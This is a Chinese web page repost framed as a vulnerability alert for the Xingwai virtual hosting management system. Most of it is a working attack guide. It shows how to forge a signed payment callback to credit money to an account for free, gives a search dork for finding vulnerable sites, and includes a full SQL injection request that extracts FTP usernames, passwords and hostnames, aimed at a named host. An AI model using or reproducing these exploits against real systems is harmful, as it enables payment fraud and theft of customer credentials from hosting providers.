星外虚拟主机管理系统刷钱漏洞+注射漏洞漏洞预警 -电脑资料

电脑资料 时间:2019-01-01 我要投稿
【www.unjs.com - 电脑资料】

   

    测试站:http://www.***.com/

    注册账号,例如:test

    访问:http://www.***.com/netpay/ips/

    输入你用户名 以及 充值金额,

星外虚拟主机管理系统刷钱漏洞+注射漏洞漏洞预警

    例如: test 10元

    点下一步,会给你生成一个订单号。比如722978

    记住它

    参数构造:

    billno=订单号&amount=充值金额&date=日期&succ=Y&signature=md5值

    复制代码

    日期 = 当前日期

    充值金额 = 订单号上的金额

    加入实际值:

    billno=722978&amount=5&date=20100613&succ=Y&signature=990a56c327f4b60d0c4d94a880f728ec

    md5值=md5(billno&amount&date&succ)

    这里演示的实际md5值为:

    md5(722978520100613Y)=990a56c327f4b60d0c4d94a880f728ec

    提交url

    http://www.xx.com/netpay/ips/receive.asp?billno=722978&amount=5&date=20100613&succ=Y&signature=990a56c327f4b60d0c4d94a880f728ec

    这样5块钱就来了,

电脑资料

星外虚拟主机管理系统刷钱漏洞+注射漏洞漏洞预警》(https://www.unjs.com)。

    给你们一个关键字:inurl: (netpay/alipay)

    注射漏洞

    POST /netpay/allbuy/receive.asp?amount=1&success=Y&sign=d3d9df7301929c5684fb52c267186b21 HTTP/1.1

    Cookie: billno=1'%20or%200%3c%3e(select%20top%201%20ftpname%2bchar(124)%2bftppassword%2bchar(124)%2bhostname%20from%20FreeHost.FreeHost_Product_Host%20where%20id%20not%20in(select%20top%200%20id%20from%20FreeHost.FreeHost_Product_Host%20order%20by%20id)%20order%20by%20id)%3b--

    Content-Type: application/x-www-form-urlencoded

    Referer:http://www.9c2c.com/netpay/allbuy/receive.asp?amount=1&success=Y&sign=d3d9df7301929c5684fb52c267186b21

    Host:www.9c2c.com

    Content-Length: 7

    Expect: 100-continue

    Connection: Keep-Alive

最新文章